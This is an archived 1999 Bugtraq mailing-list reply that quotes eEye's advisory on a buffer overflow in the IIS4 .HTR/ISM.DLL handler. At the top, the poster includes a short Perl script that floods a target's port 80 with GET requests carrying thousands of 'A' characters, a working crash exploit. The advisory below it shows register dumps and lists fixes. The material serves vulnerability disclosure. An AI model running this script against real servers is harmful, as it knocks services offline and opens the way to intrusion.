[10827] in bugtraq
Re: Retina vs. IIS4, Round 2, KO
daemon@ATHENA.MIT.EDU (Ryan R Permeh)
Tue Jun 15 19:24:12 1999
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: QUOTED-PRINTABLE
Message-Id: <u1zfdxgwc.fsf@rconnect.com>
Date: Tue, 15 Jun 1999 17:01:23 -0500
Reply-To: Ryan R Permeh <rrpermeh@RCONNECT.COM>
From: Ryan R Permeh <rrpermeh@RCONNECT.COM>
X-To: eEye - Digital Security Team <eeye@EEYE.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: eEye - Digital Security Team's message of "Tue, 15 Jun 1999
12:18:16 -0000"
tested, this works for me... scripting was turned on... perl exploit
code follows:
#!/usr/bin/perl
#props to the absu crew
use Net::Telnet;
for ($i=3D2500;$i<3500;$i++)
{
$obj=3DNet::Telnet->new( Host =3D> "$ARGV[0]",Port =3D> 80);
my $cmd =3D "GET /". 'A' x $i . ".htr HTTP/1.0\n";
print "$cmd\n";$obj->print("$cmd");
$obj->close;
}
/ eEye - Digital Security Team <eeye@EEYE.COM> wrote:
| Retina vs. IIS4, Round 2
|
| Systems Affected:
|
| Internet Information Server 4.0 (IIS4)
| Microsoft Windows NT 4.0 SP3 Option Pack 4
| Microsoft Windows NT 4.0 SP4 Option Pack 4
| Microsoft Windows NT 4.0 SP5 Option Pack 4
|
| Release Date:
|
| June 8, 1999
|
| Advisory Code:
|
| AD06081999
|
| Description:
|
| We have been debating how to start out this advisory. How do you expl=
ain
| that 90% or so of the Windows NT web servers on the Internet are open=
to a
| hole that lets an attacker execute arbitrary code on the remote web s=
erver?
| So the story starts...
|
| The Goal:
|
| Find a buffer overflow that will affect 90% of the Windows NT web ser=
vers on
| the Internet. Exploit this buffer overflow.
|
| The Theory:
|
| There will be overflows in at least one of the default IIS filtered
| extensions (i.e. .ASP, .IDC, .HTR). The way we think the exploit wil=
l take
| place is that IIS will pass the full URL to the DLL that handles the
| extension. Therefore if the ISAPI DLL does not do proper bounds check=
ing it
| will overflow a buffer taking IIS (inetinfo.exe) with it and allow us=
to
| execute arbitrary code on the remote server.
|
| Entrance Retina:
|
| At the same time of working on this advisory we have been working on =
the AI
| mining logic for Retina's HTTP module. What better test scenario than=
this?
| We gave Retina a list of 10 or so extensions common to IIS and instru=
cted it
| to find any possible holes relating to these extensions.
|
| The Grind:
|
| After about an hour Retina found what appeared to be a hole. It displ=
ayed
| that after sending "GET /[overflow].htr HTTP/1.0" it had crashed the =
server.
| We all crossed our fingers, started up the good ol' debugger and had =
Retina
| hit the server again.
|
| Note: [overflow] is 3k or so characters... but we will not get into t=
he
| string lengths and such here. View the debug info and have a look for
| yourself.
|
| The Registers:
|
| EAX =3D 00F7FCC8 EBX =3D 00F41130
| ECX =3D 41414141 EDX =3D 77F9485A
| ESI =3D 00F7FCC0 EDI =3D 00F7FCC0
| EIP =3D 41414141 ESP =3D 00F4106C
| EBP =3D 00F4108C EFL =3D 00000246
|
| Note: Retina was using "A" (0x41 in hex) for the character to overflo=
w with.
| If you're not familiar with buffer overflows a quick note would be th=
at
| getting our bytes into any of the registers is a good sign, and direc=
tly
| into EIP makes it even easier :)
|
| Explain This:
|
| The overflow is in relation to the .HTR extensions. IIS includes the
| capability to allow Windows NT users to change their password via the=
web
| directory /iisadmpwd/. This feature is implemented as a set of .HTR f=
iles
| and the ISAPI extension file ISM.DLL. So somewhere along the line whe=
n the
| URL is passed through to ISM.DLL, proper bounds checking is not done =
and our
| overflow takes place. The .HTR/ISM.DLL ISAPI filter is installed by d=
efault
| on IIS4 servers. Looks like we got our 90% of the Windows NT web serv=
ers
| part down. However, can we exploit this?
|
| The Exploit:
|
| Yes. We can definitely exploit this and we have. We will not go into =
much
| detail here about how the buffer is exploited and such. Read the comm=
ents in
| the asm file for more information. However, one nice thing to note is=
that
| the exploit has been crafted in such a way to work on SP4 and SP5 mac=
hines,
| therefore there is no guessing of offsets and possible accidental cra=
shing
| of the remote server. We have not tested the exploit on SP3 and would=
love
| to know if it works or not. eMail alert@eEye.com if you've successful=
ly
| exploited this hole on SP3.
|
| For more details about the exploit visit the eEye web site at www.eEy=
e.com
|
| The Fallout:
|
| Almost 90% of the Windows NT web servers on the Internet are affected=
by
| this hole. Everyone from NASDAQ to the U.S. Army to Microsoft themsel=
ves.
| No, we did not try it on the above mentioned. But it is easy to verif=
y if a
| web server is exploitable without using the exploit. Even a server th=
at's
| locked in a guarded room behind a Cisco Pix can be broken into with t=
his
| hole. This is a reminder to all software vendors that testing for com=
mon
| security holes in your software is a must. Demand more from your soft=
ware
| vendors.
|
| The Request. (Well one anyway.)
|
| Dear Microsoft,
|
| One of the things that we found out is that IIS did not log any trace=
of our
| attempted hack. We recommend that you pass all server requests to the
| logging service before passing it to any ISAPI filters etc...The logg=
ing
| service should be, as named, an actual service running in a separate =
memory
| space so that when inetinfo goes down intrusion signatures are still =
logged.
|
| Retina vs. IIS4, Round 2. KO.
|
| Fixes:
|
| 1. Remove the extension .HTR from the ISAPI DLL list. Microsoft has j=
ust
| updated their checklist to include this interim fix.
| http://microsoft.com/security/products/iis/CheckList.asp
| 2. Apply the patch supplied by Microsoft when available.
| http://microsoft.com/security
|
| Vendor Status:
|
| We contacted Microsoft on June 8th 1999, eEye Digital Security Team p=
rovided
| all information needed to reproduce the exploit. and how to fix it.
| Microsoft security team did confirm the exploit and are releasing a p=
atch
| for IIS.
|
| Related Links
|
| Advisory - On our web site
| http://www.eEye.com/database/advisories/ad06081999/ad06081999.html
|
| Advisory - Retina Brain File used to uncover the hole
| http://www.eEye.com/database/advisories/ad06081999/ad06081999-brain.h=
tml
|
| Retina - The Network Security Scanner
| http://www.eEye.com/retina/
|
|
| Greetings go out to:
|
| The former Secure Networks Inc., L0pht, Phrack, ADM, Rhino9, Attritio=
n, HNN
| and any other security company or organization that believes in full
| disclosure.
|
| Copyright (c) 1999 eEye Digital Security Team
|
| Permission is hereby granted for the redistribution of this alert
| electronically. It is not to be edited in any way without express con=
sent of
| eEye. If you wish to reprint the whole or any part of this alert in a=
ny
| other medium excluding electronic medium, please e-mail alert@eEye.co=
m for
| permission.
|
| Disclaimer:
|
| The information within this paper may change without notice. Use of t=
his
| information constitutes acceptance for use in an AS IS condition. The=
re are
| NO warranties with regard to this information. In no event shall the =
author
| be liable for any damages whatsoever arising out of or in connection =
with
| the use or spread of this information. Any use of this information is=
at the
| user's own risk.
|
| Please send suggestions, updates, and comments to:
|
| eEye Digital Security Team
|
| info@eEye.com
| www.eEye.com
|
|
--
----------------------------------------------------------------
Ryan R Permeh=A0=A0=A0=A0=A0 E-MAIL: rrpermeh@rconnect.com=A0=A0=A0=A0=A0
IS Engineer=A0=A0=A0=A0=A0=A0 WEB=A0=A0 : http://www.rconnect.com
Rural Connections HELP=A0 : help@rconnect.com
FAQ=A0=A0 : http://www.rconnect.com/help =A0=A0
SALES : sales@rconnect.com
----------------------------------------------------------------
120 First Street NE=A0=A0 PHONE : (507) 281-5005 =A0=A0=A0=A0=A0=A0=A0=A0=
=A0
Rochester, MN=A055906=A0=A0 FAX=A0=A0 : (507) 281-9272=A0=A0=A0=A0 =A0
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP for Personal Privacy 5.5.2
mQGiBDcgdWARBADnxcSfGnU0uzDZM95Rw9bXhcCeGut0mhB45TOPvi+dxqC1D4Fi
a8WusSx+wMg6YvsNoYfUAZH7EGLFFUwmEQRiU1gLZsUZztKGIQZXnTxfkD3sZmDa
QMZ+Li8vLrcnSA0wMVjeoHmmlGDh6P10AdqgeXrkvjpVLe9XNUE+qF1eNwCg/1Od
OXKodgatoLW8Su4gNhR86qMD/1LVlPfESc9Ojgi+kQb2KK1q+49Yk4nRa/0JxT8/
HkT0r9a9Yn21B1rMmvXruQHbqWmMQFhWNbsA3cHB9ggBfk5MntnQthJHQn0BRDRp
TaQl77b8uftW9h6d1Z4mwbSMkb+ZjaOPGwrrTt9NnSbspdjyluw84rvOKtB8E8uS
TajABACL6aH5J9rurP/tmLsVXvk4Fpvb9nAENyu+1AJwm05+mpxf+mejkvYAQNRV
PsOjIdXVgGEZoJxdYNGtJSF4ukHo2kfwJwLR4+UgbO49d+Fuu0mylmiOlrjpFljF
d947Zuggv5mCPQPeJ9QlmmLGo1HUwEAn7sOEedXDLZ4e17wo97QjUnlhbiBQZXJt
ZWggPHJycGVybWVoQHJjb25uZWN0LmNvbT6JAEsEEBECAAsFAjcgdWAECwMCAQAK
CRDZLKC1ZGph5sYIAKDYq6eFSE4oFTIAyuOtcc2PxmdrbQCg3Hjv2cydFHwR+I5S
5g+VCQjo8vq5Ag0ENyB1YBAIAPZCV7cIfwgXcqK61qlC8wXo+VMROU+28W65Szgg
2gGnVqMU6Y9AVfPQB8bLQ6mUrfdMZIZJ+AyDvWXpF9Sh01D49Vlf3HZSTz09jdvO
meFXklnN/biudE/F/Ha8g8VHMGHOfMlm/xX5u/2RXscBqtNbno2gpXI61Brwv0YA
WCvl9Ij9WE5J280gtJ3kkQc2azNsOA1FHQ98iLMcfFstjvbzySPAQ/ClWxiNjrtV
jLhdONM0/XwXV0OjHRhs3jMhLLUq/zzhsSlAGBGNfISnCnLWhsQDGcgHKXrKlQzZ
lp+r0ApQmwJG0wg9ZqRdQZ+cfL2JSyIZJrqrol7DVekyCzsAAgIIALjRqRKSXFjt
MgpciCFucMc+PLZG9nkfHJHWawm/ZJLW99qmBjRF67SDLN9p2b8ZPgVKVtS6udwP
j5E25JQIgS137FZ8hpyEorXyYXHbnN3Wt7Wg6auJY4NOJVKePx2TWjCMgpgXCuf0
Z0+aYXYB/KG52sj0P0l/m5QjE35ftPJHnALoHjYwRcdPty3FTG3XT9+ctsl0PKSP
983KxkyFNuNFhZBUyxATUhAbosHDBOew2eoBf6xXMAs4b27ljGrisIttX5h5N3PO
PqBOwPuL24DqY56borp+jx3+1Ux1FL9sNqxH+AD4aRBYrllyLy5wZS37YgP671Hh
vA6NTSWnW0iJAEYEGBECAAYFAjcgdWAACgkQ2SygtWRqYeY0BQCcCh+xJQbiUHsB
JHM9Gml2lBmLMB4AmwT11BegWTahprjZFp1wAD4+6uKo
=3DpGLY
-----END PGP PUBLIC KEY BLOCK-----
